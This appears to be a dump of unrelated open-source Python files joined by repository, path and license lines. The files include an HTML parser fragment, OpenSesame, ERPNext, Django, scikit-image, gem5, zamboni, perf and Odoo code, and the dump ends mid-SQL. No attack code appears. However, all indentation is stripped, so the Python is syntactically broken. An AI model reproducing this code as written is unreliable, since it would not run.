gtpos = rawdata.find('>', i+9)
if gtpos == -1:
return -1
self.handle_decl(rawdata[i+2:gtpos])
return gtpos+1
else:
return self.parse_bogus_comment(i)
# Internal -- parse bogus comment, return length or -1 if not terminated
# see http://www.w3.org/TR/html5/tokenization.html#bogus-comment-state
def parse_bogus_comment(self, i, report=1):
rawdata = self.rawdata
assert rawdata[i:i+2] in ('<!', '</'), ('unexpected call to '
'parse_comment()')
pos = rawdata.find('>', i+2)
if pos == -1:
return -1
if report:
self.handle_comment(rawdata[i+2:pos])
return pos + 1
# Internal -- parse processing instr, return end or -1 if not terminated
def parse_pi(self, i):
rawdata = self.rawdata
assert rawdata[i:i+2] == '<?', 'unexpected call to parse_pi()'
match = piclose.search(rawdata, i+2) # >
if not match:
return -1
j = match.start()
self.handle_pi(rawdata[i+2: j])
j = match.end()
return j
# Internal -- handle starttag, return end or -1 if not terminated
def parse_starttag(self, i):
self.__starttag_text = None
endpos = self.check_for_whole_start_tag(i)
if endpos < 0:
return endpos
rawdata = self.rawdata
self.__starttag_text = rawdata[i:endpos]
# Now parse the data between i+1 and j into a tag and attrs
attrs = []
match = tagfind.match(rawdata, i+1)
assert match, 'unexpected call to parse_starttag()'
k = match.end()
self.lasttag = tag = match.group(1).lower()
while k < endpos:
if self.strict:
m = attrfind.match(rawdata, k)
else:
m = attrfind_tolerant.match(rawdata, k)
if not m:
break
attrname, rest, attrvalue = m.group(1, 2, 3)
if not rest:
attrvalue = None
elif attrvalue[:1] == '\'' == attrvalue[-1:] or \
attrvalue[:1] == '"' == attrvalue[-1:]:
attrvalue = attrvalue[1:-1]
if attrvalue:
attrvalue = self.unescape(attrvalue)
attrs.append((attrname.lower(), attrvalue))
k = m.end()
end = rawdata[k:endpos].strip()
if end not in (">", "/>"):
lineno, offset = self.getpos()
if "\n" in self.__starttag_text:
lineno = lineno + self.__starttag_text.count("\n")
offset = len(self.__starttag_text) \
- self.__starttag_text.rfind("\n")
else:
offset = offset + len(self.__starttag_text)
if self.strict:
self.error("junk characters in start tag: %r"
% (rawdata[k:endpos][:20],))
self.handle_data(rawdata[i:endpos])
return endpos
if end.endswith('/>'):
# XHTML-style empty tag: <span attr="value" />
self.handle_startendtag(tag, attrs)
else:
self.handle_starttag(tag, attrs)
if tag in self.CDATA_CONTENT_ELEMENTS:
self.set_cdata_mode(tag)
return endpos
# Internal -- check to see if we have a complete starttag; return end
# or -1 if incomplete.
def check_for_whole_start_tag(self, i):
rawdata = self.rawdata
if self.strict:
m = locatestarttagend.match(rawdata, i)
else:
m = locatestarttagend_tolerant.match(rawdata, i)
if m:
j = m.end()
next = rawdata[j:j+1]
if next == ">":
return j + 1
if next == "/":
if rawdata.startswith("/>", j):
return j + 2
if rawdata.startswith("/", j):
# buffer boundary
return -1
# else bogus input
if self.strict:
self.updatepos(i, j + 1)
self.error("malformed empty start tag")
if j > i:
return j
else:
return i + 1
if next == "":
# end of input
return -1
if next in ("abcdefghijklmnopqrstuvwxyz=/"
"ABCDEFGHIJKLMNOPQRSTUVWXYZ"):
# end of input in or before attribute value, or we have the
# '/' from a '/>' ending
return -1
if self.strict:
self.updatepos(i, j)
self.error("malformed start tag")
if j > i:
return j
else:
return i + 1
raise AssertionError("we should not get here!")
# Internal -- parse endtag, return end or -1 if incomplete
def parse_endtag(self, i):
rawdata = self.rawdata
assert rawdata[i:i+2] == "</", "unexpected call to parse_endtag"
match = endendtag.search(rawdata, i+1) # >
if not match:
return -1
gtpos = match.end()
match = endtagfind.match(rawdata, i) # </ + tag + >
if not match:
if self.cdata_elem is not None:
self.handle_data(rawdata[i:gtpos])
return gtpos
if self.strict:
self.error("bad end tag: %r" % (rawdata[i:gtpos],))
# find the name: w3.org/TR/html5/tokenization.html#tag-name-state
namematch = tagfind_tolerant.match(rawdata, i+2)
if not namematch:
# w3.org/TR/html5/tokenization.html#end-tag-open-state
if rawdata[i:i+3] == '</>':
return i+3
else:
return self.parse_bogus_comment(i)
tagname = namematch.group().lower()
# consume and ignore other stuff between the name and the >
# Note: this is not 100% correct, since we might have things like
# </tag attr=">">, but looking for > after tha name should cover
# most of the cases and is much simpler
gtpos = rawdata.find('>', namematch.end())
self.handle_endtag(tagname)
return gtpos+1
elem = match.group(1).lower() # script or style
if self.cdata_elem is not None:
if elem != self.cdata_elem:
self.handle_data(rawdata[i:gtpos])
return gtpos
self.handle_endtag(elem.lower())
self.clear_cdata_mode()
return gtpos
# Overridable -- finish processing of start+end tag: <tag.../>
def handle_startendtag(self, tag, attrs):
self.handle_starttag(tag, attrs)
self.handle_endtag(tag)
# Overridable -- handle start tag
def handle_starttag(self, tag, attrs):
pass
# Overridable -- handle end tag
def handle_endtag(self, tag):
pass
# Overridable -- handle character reference
def handle_charref(self, name):
pass
# Overridable -- handle entity reference
def handle_entityref(self, name):
pass
# Overridable -- handle data
def handle_data(self, data):
pass
# Overridable -- handle comment
def handle_comment(self, data):
pass
# Overridable -- handle declaration
def handle_decl(self, decl):
pass
# Overridable -- handle processing instruction
def handle_pi(self, data):
pass
def unknown_decl(self, data):
if self.strict:
self.error("unknown declaration: %r" % (data,))
# Internal -- helper to remove special character quoting
def unescape(self, s):
if '&' not in s:
return s
def replaceEntities(s):
s = s.groups()[0]
try:
if s[0] == "#":
s = s[1:]
if s[0] in ['x','X']:
c = int(s[1:].rstrip(';'), 16)
else:
c = int(s.rstrip(';'))
return chr(c)
except ValueError:
return '&#' + s
else:
from html.entities import html5
if s in html5:
return html5[s]
elif s.endswith(';'):
return '&' + s
for x in range(2, len(s)):
if s[:x] in html5:
return html5[s[:x]] + s[x:]
else:
return '&' + s
return re.sub(r"&(#?[xX]?(?:[0-9a-fA-F]+;|\w{1,32};?))",
replaceEntities, s, flags=re.ASCII)
| agpl-3.0 |
SCgeeker/OpenSesame | libqtopensesame/widgets/loop_table.py | 2 | 2783 | #-*- coding:utf-8 -*-
"""
This file is part of OpenSesame.
OpenSesame is free software: you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation, either version 3 of the License, or
(at your option) any later version.
OpenSesame is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with OpenSesame. If not, see <http://www.gnu.org/licenses/>.
"""
__author__ = "Sebastiaan Mathot"
__license__ = "GPLv3"
from libqtopensesame.widgets import good_looking_table
from libqtopensesame.misc import _
from PyQt4 import QtCore, QtGui
class loop_table(good_looking_table.good_looking_table):
"""The looptable extends the QtTableWidget to allow copying and pasting"""
def __init__(self, loop, rows, columns, parent=None):
"""
Constructor
Arguments:
loop -- the loop item
rows -- the nr of rows
columns -- the nr of columns
Keyword arguments:
parent -- parent QWidget (default=None)
"""
self.pos = None
self.loop = loop
self.lock = False
icons = {}
icons["cut"] = self.loop.experiment.icon("cut")
icons["copy"] = self.loop.experiment.icon("copy")
icons["paste"] = self.loop.experiment.icon("paste")
icons["clear"] = self.loop.experiment.icon("clear")
if not isinstance(rows, int):
self.loop.user_hint_widget.add(
_(u'Invalid or variably defined number of cycles: %s' % rows))
self.loop.user_hint_widget.refresh()
rows = 0
good_looking_table.good_looking_table.__init__(self,
rows, columns, icons, parent)
self.cellChanged.connect(self.apply_changes)
def paste(self):
"""Paste data from the clipboard into the table"""
self.lock = True
good_looking_table.good_looking_table.paste(self)
self.lock = False
self.apply_changes()
def _clear(self):
"""Clear the table"""
self.lock = True
good_looking_table.good_looking_table._clear(self)
self.lock = False
self.apply_changes()
def apply_changes(self):
"""
Apply changes to the table and make sure that the cursor is restored to
its previous position
"""
if self.lock:
return
self.loop.apply_edit_changes()
def set_text(self, cycle, col, text):
"""
desc:
Sets text in the loop table in a way that doesn't trigger a
cellChanged signal.
arguments:
cycle:
desc: The row.
type: int
col:
desc: The column.
type: int
text:
desc: The text.
type: unicode
"""
self.blockSignals(True)
self.setItem(cycle, col, QtGui.QTableWidgetItem(text))
self.blockSignals(False)
| gpl-3.0 |
netfirms/erpnext | erpnext/controllers/website_list_for_contact.py | 32 | 2945 | # Copyright (c) 2015, Frappe Technologies Pvt. Ltd. and Contributors
# License: GNU General Public License v3. See license.txt
from __future__ import unicode_literals
import json
import frappe
from frappe import _
from frappe.utils import flt
from frappe.utils.user import is_website_user
def get_list_context(context=None):
return {
"global_number_format": frappe.db.get_default("number_format") or "#,###.##",
"currency": frappe.db.get_default("currency"),
"currency_symbols": json.dumps(dict(frappe.db.sql("""select name, symbol
from tabCurrency where ifnull(enabled,0)=1"""))),
"row_template": "templates/includes/transaction_row.html",
"get_list": get_transaction_list
}
def get_transaction_list(doctype, txt=None, filters=None, limit_start=0, limit_page_length=20):
from frappe.templates.pages.list import get_list
user = frappe.session.user
if user != "Guest" and is_website_user():
# find party for this contact
customers, suppliers = get_customers_suppliers(doctype, user)
if customers:
return post_process(get_list(doctype, txt, filters=[(doctype, "customer", "in", customers)],
limit_start=limit_start, limit_page_length=limit_page_length, ignore_permissions=True))
elif suppliers:
return post_process(get_list(doctype, txt, filters=[(doctype, "supplier", "in", suppliers)],
limit_start=limit_start, limit_page_length=limit_page_length, ignore_permissions=True))
else:
return []
return post_process(get_list(doctype, txt, filters, limit_start, limit_page_length))
def post_process(result):
for r in result:
r.status_percent = 0
r.status_display = []
if r.get("per_billed"):
r.status_percent += flt(r.per_billed)
r.status_display.append(_("Billed") if r.per_billed==100 else _("{0}% Billed").format(r.per_billed))
if r.get("per_delivered"):
r.status_percent += flt(r.per_delivered)
r.status_display.append(_("Delivered") if r.per_delivered==100 else _("{0}% Delivered").format(r.per_delivered))
r.status_display = ", ".join(r.status_display)
return result
def get_customers_suppliers(doctype, user):
meta = frappe.get_meta(doctype)
contacts = frappe.get_all("Contact", fields=["customer", "supplier", "email_id"],
filters={"email_id": user})
customers = [c.customer for c in contacts if c.customer] if meta.get_field("customer") else None
suppliers = [c.supplier for c in contacts if c.supplier] if meta.get_field("supplier") else None
return customers, suppliers
def has_website_permission(doc, ptype, user, verbose=False):
doctype = doc.doctype
customers, suppliers = get_customers_suppliers(doctype, user)
if customers:
return frappe.get_all(doctype, filters=[(doctype, "customer", "in", customers),
(doctype, "name", "=", doc.name)]) and True or False
elif suppliers:
return frappe.get_all(doctype, filters=[(doctype, "suppliers", "in", suppliers),
(doctype, "name", "=", doc.name)]) and True or False
else:
return False
| agpl-3.0 |
tjsavage/rototutor_djangononrel | django/contrib/localflavor/it/util.py | 436 | 1807 | from django.utils.encoding import smart_str, smart_unicode
def ssn_check_digit(value):
"Calculate Italian social security number check digit."
ssn_even_chars = {
'0': 0, '1': 1, '2': 2, '3': 3, '4': 4, '5': 5, '6': 6, '7': 7, '8': 8,
'9': 9, 'A': 0, 'B': 1, 'C': 2, 'D': 3, 'E': 4, 'F': 5, 'G': 6, 'H': 7,
'I': 8, 'J': 9, 'K': 10, 'L': 11, 'M': 12, 'N': 13, 'O': 14, 'P': 15,
'Q': 16, 'R': 17, 'S': 18, 'T': 19, 'U': 20, 'V': 21, 'W': 22, 'X': 23,
'Y': 24, 'Z': 25
}
ssn_odd_chars = {
'0': 1, '1': 0, '2': 5, '3': 7, '4': 9, '5': 13, '6': 15, '7': 17, '8':
19, '9': 21, 'A': 1, 'B': 0, 'C': 5, 'D': 7, 'E': 9, 'F': 13, 'G': 15,
'H': 17, 'I': 19, 'J': 21, 'K': 2, 'L': 4, 'M': 18, 'N': 20, 'O': 11,
'P': 3, 'Q': 6, 'R': 8, 'S': 12, 'T': 14, 'U': 16, 'V': 10, 'W': 22,
'X': 25, 'Y': 24, 'Z': 23
}
# Chars from 'A' to 'Z'
ssn_check_digits = [chr(x) for x in range(65, 91)]
ssn = value.upper()
total = 0
for i in range(0, 15):
try:
if i % 2 == 0:
total += ssn_odd_chars[ssn[i]]
else:
total += ssn_even_chars[ssn[i]]
except KeyError:
msg = "Character '%(char)s' is not allowed." % {'char': ssn[i]}
raise ValueError(msg)
return ssn_check_digits[total % 26]
def vat_number_check_digit(vat_number):
"Calculate Italian VAT number check digit."
normalized_vat_number = smart_str(vat_number).zfill(10)
total = 0
for i in range(0, 10, 2):
total += int(normalized_vat_number[i])
for i in range(1, 11, 2):
quotient , remainder = divmod(int(normalized_vat_number[i]) * 2, 10)
total += quotient + remainder
return smart_unicode((10 - total % 10) % 10)
| bsd-3-clause |
pratapvardhan/scikit-image | doc/examples/edges/plot_line_hough_transform.py | 7 | 4757 | """
=============================
Straight line Hough transform
=============================
The Hough transform in its simplest form is a `method to detect straight lines
<http://en.wikipedia.org/wiki/Hough_transform>`__.
In the following example, we construct an image with a line intersection. We
then use the Hough transform to explore a parameter space for straight lines
that may run through the image.
Algorithm overview
------------------
Usually, lines are parameterised as :math:`y = mx + c`, with a gradient
:math:`m` and y-intercept `c`. However, this would mean that :math:`m` goes to
infinity for vertical lines. Instead, we therefore construct a segment
perpendicular to the line, leading to the origin. The line is represented by
the length of that segment, :math:`r`, and the angle it makes with the x-axis,
:math:`\theta`.
The Hough transform constructs a histogram array representing the parameter
space (i.e., an :math:`M \times N` matrix, for :math:`M` different values of
the radius and :math:`N` different values of :math:`\theta`). For each
parameter combination, :math:`r` and :math:`\theta`, we then find the number of
non-zero pixels in the input image that would fall close to the corresponding
line, and increment the array at position :math:`(r, \theta)` appropriately.
We can think of each non-zero pixel "voting" for potential line candidates. The
local maxima in the resulting histogram indicates the parameters of the most
probably lines. In our example, the maxima occur at 45 and 135 degrees,
corresponding to the normal vector angles of each line.
Another approach is the Progressive Probabilistic Hough Transform [1]_. It is
based on the assumption that using a random subset of voting points give a good
approximation to the actual result, and that lines can be extracted during the
voting process by walking along connected components. This returns the
beginning and end of each line segment, which is useful.
The function `probabilistic_hough` has three parameters: a general threshold
that is applied to the Hough accumulator, a minimum line length and the line
gap that influences line merging. In the example below, we find lines longer
than 10 with a gap less than 3 pixels.
References
----------
.. [1] C. Galamhos, J. Matas and J. Kittler,"Progressive probabilistic
Hough transform for line detection", in IEEE Computer Society
Conference on Computer Vision and Pattern Recognition, 1999.
.. [2] Duda, R. O. and P. E. Hart, "Use of the Hough Transformation to
Detect Lines and Curves in Pictures," Comm. ACM, Vol. 15,
pp. 11-15 (January, 1972)
"""
from matplotlib import cm
from skimage.transform import (hough_line, hough_line_peaks,
probabilistic_hough_line)
from skimage.feature import canny
from skimage import data
import numpy as np
import matplotlib.pyplot as plt
# Constructing test image.
image = np.zeros((100, 100))
idx = np.arange(25, 75)
image[idx[::-1], idx] = 255
image[idx, idx] = 255
# Classic straight-line Hough transform.
h, theta, d = hough_line(image)
# Generating figure 1.
fig, (ax0, ax1, ax2) = plt.subplots(1, 3, figsize=(12, 6))
plt.tight_layout()
ax0.imshow(image, cmap=cm.gray)
ax0.set_title('Input image')
ax0.set_axis_off()
ax1.imshow(np.log(1 + h), extent=[np.rad2deg(theta[-1]), np.rad2deg(theta[0]),
d[-1], d[0]], cmap=cm.gray, aspect=1/1.5)
ax1.set_title('Hough transform')
ax1.set_xlabel('Angles (degrees)')
ax1.set_ylabel('Distance (pixels)')
ax1.axis('image')
ax2.imshow(image, cmap=cm.gray)
row1, col1 = image.shape
for _, angle, dist in zip(*hough_line_peaks(h, theta, d)):
y0 = (dist - 0 * np.cos(angle)) / np.sin(angle)
y1 = (dist - col1 * np.cos(angle)) / np.sin(angle)
ax2.plot((0, col1), (y0, y1), '-r')
ax2.axis((0, col1, row1, 0))
ax2.set_title('Detected lines')
ax2.set_axis_off()
# Line finding using the Probabilistic Hough Transform.
image = data.camera()
edges = canny(image, 2, 1, 25)
lines = probabilistic_hough_line(edges, threshold=10, line_length=5,
line_gap=3)
# Generating figure 2.
fig, (ax0, ax1, ax2) = plt.subplots(1, 3, figsize=(16, 6), sharex=True,
sharey=True)
plt.tight_layout()
ax0.imshow(image, cmap=cm.gray)
ax0.set_title('Input image')
ax0.set_axis_off()
ax0.set_adjustable('box-forced')
ax1.imshow(edges, cmap=cm.gray)
ax1.set_title('Canny edges')
ax1.set_axis_off()
ax1.set_adjustable('box-forced')
ax2.imshow(edges * 0)
for line in lines:
p0, p1 = line
ax2.plot((p0[0], p1[0]), (p0[1], p1[1]))
row2, col2 = image.shape
ax2.axis((0, col2, row2, 0))
ax2.set_title('Probabilistic Hough')
ax2.set_axis_off()
ax2.set_adjustable('box-forced')
plt.show()
| bsd-3-clause |
moazzemi/HAMEX | cpu/gem5/src/dev/pci/PciDevice.py | 23 | 7947 | # Copyright (c) 2013 ARM Limited
# All rights reserved
#
# The license below extends only to copyright in the software and shall
# not be construed as granting a license to any other intellectual
# property including but not limited to intellectual property relating
# to a hardware implementation of the functionality of the software
# licensed hereunder. You may use the software subject to the license
# terms below provided that you ensure that this notice is replicated
# unmodified and in its entirety in all distributions of the software,
# modified or unmodified, in source code or in binary form.
#
# Copyright (c) 2005-2007 The Regents of The University of Michigan
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met: redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer;
# redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution;
# neither the name of the copyright holders nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
# OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
#
# Authors: Nathan Binkert
from m5.SimObject import SimObject
from m5.params import *
from m5.proxy import *
from Device import DmaDevice
from PciHost import PciHost
class PciDevice(DmaDevice):
type = 'PciDevice'
cxx_class = 'PciDevice'
cxx_header = "dev/pci/device.hh"
abstract = True
host = Param.PciHost(Parent.any, "PCI host")
pci_bus = Param.Int("PCI bus")
pci_dev = Param.Int("PCI device number")
pci_func = Param.Int("PCI function code")
pio_latency = Param.Latency('30ns', "Programmed IO latency")
config_latency = Param.Latency('20ns', "Config read or write latency")
VendorID = Param.UInt16("Vendor ID")
DeviceID = Param.UInt16("Device ID")
Command = Param.UInt16(0, "Command")
Status = Param.UInt16(0, "Status")
Revision = Param.UInt8(0, "Device")
ProgIF = Param.UInt8(0, "Programming Interface")
SubClassCode = Param.UInt8(0, "Sub-Class Code")
ClassCode = Param.UInt8(0, "Class Code")
CacheLineSize = Param.UInt8(0, "System Cacheline Size")
LatencyTimer = Param.UInt8(0, "PCI Latency Timer")
HeaderType = Param.UInt8(0, "PCI Header Type")
BIST = Param.UInt8(0, "Built In Self Test")
BAR0 = Param.UInt32(0x00, "Base Address Register 0")
BAR1 = Param.UInt32(0x00, "Base Address Register 1")
BAR2 = Param.UInt32(0x00, "Base Address Register 2")
BAR3 = Param.UInt32(0x00, "Base Address Register 3")
BAR4 = Param.UInt32(0x00, "Base Address Register 4")
BAR5 = Param.UInt32(0x00, "Base Address Register 5")
BAR0Size = Param.MemorySize32('0B', "Base Address Register 0 Size")
BAR1Size = Param.MemorySize32('0B', "Base Address Register 1 Size")
BAR2Size = Param.MemorySize32('0B', "Base Address Register 2 Size")
BAR3Size = Param.MemorySize32('0B', "Base Address Register 3 Size")
BAR4Size = Param.MemorySize32('0B', "Base Address Register 4 Size")
BAR5Size = Param.MemorySize32('0B', "Base Address Register 5 Size")
BAR0LegacyIO = Param.Bool(False, "Whether BAR0 is hardwired legacy IO")
BAR1LegacyIO = Param.Bool(False, "Whether BAR1 is hardwired legacy IO")
BAR2LegacyIO = Param.Bool(False, "Whether BAR2 is hardwired legacy IO")
BAR3LegacyIO = Param.Bool(False, "Whether BAR3 is hardwired legacy IO")
BAR4LegacyIO = Param.Bool(False, "Whether BAR4 is hardwired legacy IO")
BAR5LegacyIO = Param.Bool(False, "Whether BAR5 is hardwired legacy IO")
LegacyIOBase = Param.Addr(0x0, "Base Address for Legacy IO")
CardbusCIS = Param.UInt32(0x00, "Cardbus Card Information Structure")
SubsystemID = Param.UInt16(0x00, "Subsystem ID")
SubsystemVendorID = Param.UInt16(0x00, "Subsystem Vendor ID")
ExpansionROM = Param.UInt32(0x00, "Expansion ROM Base Address")
CapabilityPtr = Param.UInt8(0x00, "Capability List Pointer offset")
InterruptLine = Param.UInt8(0x00, "Interrupt Line")
InterruptPin = Param.UInt8(0x00, "Interrupt Pin")
MaximumLatency = Param.UInt8(0x00, "Maximum Latency")
MinimumGrant = Param.UInt8(0x00, "Minimum Grant")
# Capabilities List structures for PCIe devices
# PMCAP - PCI Power Management Capability
PMCAPBaseOffset = \
Param.UInt8(0x00, "Base offset of PMCAP in PCI Config space")
PMCAPNextCapability = \
Param.UInt8(0x00, "Pointer to next capability block")
PMCAPCapId = \
Param.UInt8(0x00, "Specifies this is the Power Management capability")
PMCAPCapabilities = \
Param.UInt16(0x0000, "PCI Power Management Capabilities Register")
PMCAPCtrlStatus = \
Param.UInt16(0x0000, "PCI Power Management Control and Status")
# MSICAP - Message Signaled Interrupt Capability
MSICAPBaseOffset = \
Param.UInt8(0x00, "Base offset of MSICAP in PCI Config space")
MSICAPNextCapability = \
Param.UInt8(0x00, "Pointer to next capability block")
MSICAPCapId = Param.UInt8(0x00, "Specifies this is the MSI Capability")
MSICAPMsgCtrl = Param.UInt16(0x0000, "MSI Message Control")
MSICAPMsgAddr = Param.UInt32(0x00000000, "MSI Message Address")
MSICAPMsgUpperAddr = Param.UInt32(0x00000000, "MSI Message Upper Address")
MSICAPMsgData = Param.UInt16(0x0000, "MSI Message Data")
MSICAPMaskBits = Param.UInt32(0x00000000, "MSI Interrupt Mask Bits")
MSICAPPendingBits = Param.UInt32(0x00000000, "MSI Pending Bits")
# MSIXCAP - MSI-X Capability
MSIXCAPBaseOffset = \
Param.UInt8(0x00, "Base offset of MSIXCAP in PCI Config space")
MSIXCAPNextCapability = \
Param.UInt8(0x00, "Pointer to next capability block")
MSIXCAPCapId = Param.UInt8(0x00, "Specifices this the MSI-X Capability")
MSIXMsgCtrl = Param.UInt16(0x0000, "MSI-X Message Control")
MSIXTableOffset = \
Param.UInt32(0x00000000, "MSI-X Table Offset and Table BIR")
MSIXPbaOffset = Param.UInt32(0x00000000, "MSI-X PBA Offset and PBA BIR")
# PXCAP - PCI Express Capability
PXCAPBaseOffset = \
Param.UInt8(0x00, "Base offset of PXCAP in PCI Config space")
PXCAPNextCapability = Param.UInt8(0x00, "Pointer to next capability block")
PXCAPCapId = Param.UInt8(0x00, "Specifies this is the PCIe Capability")
PXCAPCapabilities = Param.UInt16(0x0000, "PCIe Capabilities")
PXCAPDevCapabilities = Param.UInt32(0x00000000, "PCIe Device Capabilities")
PXCAPDevCtrl = Param.UInt16(0x0000, "PCIe Device Control")
PXCAPDevStatus = Param.UInt16(0x0000, "PCIe Device Status")
PXCAPLinkCap = Param.UInt32(0x00000000, "PCIe Link Capabilities")
PXCAPLinkCtrl = Param.UInt16(0x0000, "PCIe Link Control")
PXCAPLinkStatus = Param.UInt16(0x0000, "PCIe Link Status")
PXCAPDevCap2 = Param.UInt32(0x00000000, "PCIe Device Capabilities 2")
PXCAPDevCtrl2 = Param.UInt32(0x00000000, "PCIe Device Control 2")
| mit |
elysium001/zamboni | mkt/games/filters.py | 8 | 1779 | import datetime
import elasticsearch_dsl.filter as es_filter
from elasticsearch_dsl import aggs, query, SF
from rest_framework.filters import BaseFilterBackend
from mkt.games.constants import GAME_CATEGORIES
class DailyGamesFilter(BaseFilterBackend):
"""
Randomly chooses 4 games, one from each featured game category, based off
of the current date such that the games are shuffled daily.
The query:
- Selects only games that match the featured game category tags.
- Scores randomly using random_score using date as seed.
- Buckets by tag, using Top Hits with size=1 to select only one game
from each category.
- elastic.co/guide/en/elasticsearch/guide/current/top-hits.html
"""
def filter_queryset(self, request, queryset, view):
daily_seed = int(datetime.datetime.now().strftime('%Y%m%d'))
# Map over the game categories to create a function score query for one
# and dump it into a Bool should.
game_query = query.Q(
'function_score',
filter=es_filter.Bool(should=[es_filter.Term(tags=cat)
for cat in GAME_CATEGORIES]),
# Consistently random based on the day.
functions=[SF('random_score', seed=daily_seed)],
)
# Buckets by tag. Run a size=1 TopHits aggregation to only select one
# game from each tag. Results will have to be pulled out of
# S.execute().aggregations rather than S.execute().hits.
top_hits = aggs.TopHits(size=1)
a = aggs.A('terms', field='tags', aggs={'first_game': top_hits})
queryset = queryset.query(game_query)[0:4]
queryset.aggs.bucket('top_hits', a) # Not chainable.
return queryset
| bsd-3-clause |
bluewish/tiny4412-linux-3.5 | tools/perf/scripts/python/Perf-Trace-Util/lib/Perf/Trace/Util.py | 12527 | 1935 | # Util.py - Python extension for perf script, miscellaneous utility code
#
# Copyright (C) 2010 by Tom Zanussi <tzanussi@gmail.com>
#
# This software may be distributed under the terms of the GNU General
# Public License ("GPL") version 2 as published by the Free Software
# Foundation.
import errno, os
FUTEX_WAIT = 0
FUTEX_WAKE = 1
FUTEX_PRIVATE_FLAG = 128
FUTEX_CLOCK_REALTIME = 256
FUTEX_CMD_MASK = ~(FUTEX_PRIVATE_FLAG | FUTEX_CLOCK_REALTIME)
NSECS_PER_SEC = 1000000000
def avg(total, n):
return total / n
def nsecs(secs, nsecs):
return secs * NSECS_PER_SEC + nsecs
def nsecs_secs(nsecs):
return nsecs / NSECS_PER_SEC
def nsecs_nsecs(nsecs):
return nsecs % NSECS_PER_SEC
def nsecs_str(nsecs):
str = "%5u.%09u" % (nsecs_secs(nsecs), nsecs_nsecs(nsecs)),
return str
def add_stats(dict, key, value):
if not dict.has_key(key):
dict[key] = (value, value, value, 1)
else:
min, max, avg, count = dict[key]
if value < min:
min = value
if value > max:
max = value
avg = (avg + value) / 2
dict[key] = (min, max, avg, count + 1)
def clear_term():
print("\x1b[H\x1b[2J")
audit_package_warned = False
try:
import audit
machine_to_id = {
'x86_64': audit.MACH_86_64,
'alpha' : audit.MACH_ALPHA,
'ia64' : audit.MACH_IA64,
'ppc' : audit.MACH_PPC,
'ppc64' : audit.MACH_PPC64,
's390' : audit.MACH_S390,
's390x' : audit.MACH_S390X,
'i386' : audit.MACH_X86,
'i586' : audit.MACH_X86,
'i686' : audit.MACH_X86,
}
try:
machine_to_id['armeb'] = audit.MACH_ARMEB
except:
pass
machine_id = machine_to_id[os.uname()[4]]
except:
if not audit_package_warned:
audit_package_warned = True
print "Install the audit-libs-python package to get syscall names"
def syscall_name(id):
try:
return audit.audit_syscall_to_name(id, machine_id)
except:
return str(id)
def strerror(nr):
try:
return errno.errorcode[abs(nr)]
except:
return "Unknown %d errno" % nr
| gpl-2.0 |
Gitlab11/odoo | addons/lunch/wizard/lunch_order.py | 440 | 1299 | # -*- encoding: utf-8 -*-
##############################################################################
#
# OpenERP, Open Source Management Solution
# Copyright (C) 2004-2012 Tiny SPRL (<http://tiny.be>).
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
from openerp.osv import fields, osv
class lunch_order_order(osv.TransientModel):
""" lunch order meal """
_name = 'lunch.order.order'
_description = 'Wizard to order a meal'
def order(self,cr,uid,ids,context=None):
return self.pool.get('lunch.order.line').order(cr, uid, ids, context=context)
| agpl-3.0 |
vnsofthe/odoo-dev | addons/account/res_currency.py | 340 | 2267 | # -*- coding: utf-8 -*-
##############################################################################
#
# Copyright (C) 2010 OpenERP s.a. (<http://www.openerp.com>).
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
from openerp.osv import osv
"""Inherit res.currency to handle accounting date values when converting currencies"""
class res_currency_account(osv.osv):
_inherit = "res.currency"
def _get_conversion_rate(self, cr, uid, from_currency, to_currency, context=None):
if context is None:
context = {}
rate = super(res_currency_account, self)._get_conversion_rate(cr, uid, from_currency, to_currency, context=context)
#process the case where the account doesn't work with an outgoing currency rate method 'at date' but 'average'
account = context.get('res.currency.compute.account')
account_invert = context.get('res.currency.compute.account_invert')
if account and account.currency_mode == 'average' and account.currency_id:
query = self.pool.get('account.move.line')._query_get(cr, uid, context=context)
cr.execute('select sum(debit-credit),sum(amount_currency) from account_move_line l ' \
